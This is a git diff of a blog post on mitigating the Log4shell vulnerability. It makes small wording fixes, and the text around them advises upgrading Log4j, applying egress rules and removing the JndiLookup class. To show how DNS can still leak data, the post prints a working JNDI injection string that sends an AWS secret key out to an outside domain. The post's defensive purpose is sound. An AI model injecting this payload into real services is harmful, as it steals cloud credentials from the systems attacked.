who1s/bd-sorsat/content/posts/2021_log4shell.md

 ![U in hurry?](/assets/images/log4j-2.17.0.png)

-The best solution to fix Log4shell, is to update Log4j version to newest available, which was at the time of writing version 2.17.0.
+The best solution to fix Log4shell, is to update Log4j version to the newest available, which was at the time of writing version 2.17.0.
 Based on the public information available at the moment, the first RCE safe version would be 2.16.0 at the moment.

 The issue can also be contained by using default deny outbound, e.q. restricting outbound connections from the server (egress rules).
-The egress rules contain RCE but the attack vector can still be used for data exfiltration, if the server can resolve domain names.
+The egress rules contain RCE, but the attack vector can still be used for data exfiltration, if the server can resolve domain names.
 For example if AWS secret keys are stored as an environment variable, it can be used as a subdomain and if an attacker has access to the name server of the used domain, they can see the query.
 This kind of attack could be achieved by injecting following string to vulnerable services:

 ```
 ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dfir.fi/log4j}
 ```

+There are also rumors of payloads that work without downloading anything from internet.
+I will update this blog post, if I come across with working one.

-Succesful mitigation of the vulnerability can be achieved by removing the vulnerable `JndiLookup` class from Log4j:
+Successful mitigation of the vulnerability can be achieved by removing the vulnerable `JndiLookup` class from Log4j:

 ```
 zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class